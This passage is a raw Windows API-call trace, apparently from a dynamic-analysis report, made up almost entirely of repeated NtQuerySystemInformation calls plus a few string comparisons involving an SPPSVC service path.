(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0281.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0281.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x20, ResultLength=0x0) [0281.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x20, ResultLength=0x0) [0281.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0281.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0281.322] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0281.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0281.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0281.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0281.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0281.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0281.348] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0281.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0281.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0281.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0281.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0281.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0281.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0281.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0281.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0281.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0281.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0281.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0281.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0281.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0281.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0281.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0281.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd30, Length=0x28, ResultLength=0x0) [0281.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0281.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdb0, Length=0x28, ResultLength=0x0) [0281.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdb0, Length=0x28, ResultLength=0x0) [0281.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x20, ResultLength=0x0) [0281.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0281.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0281.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0281.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0281.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0281.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x20, ResultLength=0x0) [0281.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0281.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0281.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x50, ResultLength=0x0) [0281.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x28, ResultLength=0x0) [0281.395] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x50, ResultLength=0x0) [0281.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x50, ResultLength=0x0) [0281.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x50, ResultLength=0x0) [0281.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce70, Length=0x28, ResultLength=0x0) [0281.396] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x50, ResultLength=0x0) [0281.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x50, ResultLength=0x0) [0281.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x50, ResultLength=0x0) [0281.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x38, ResultLength=0x0) [0281.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x28, ResultLength=0x0) [0281.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x28, ResultLength=0x0) [0281.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x28, ResultLength=0x0) [0281.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0281.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x38, ResultLength=0x0) [0281.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x28, ResultLength=0x0) 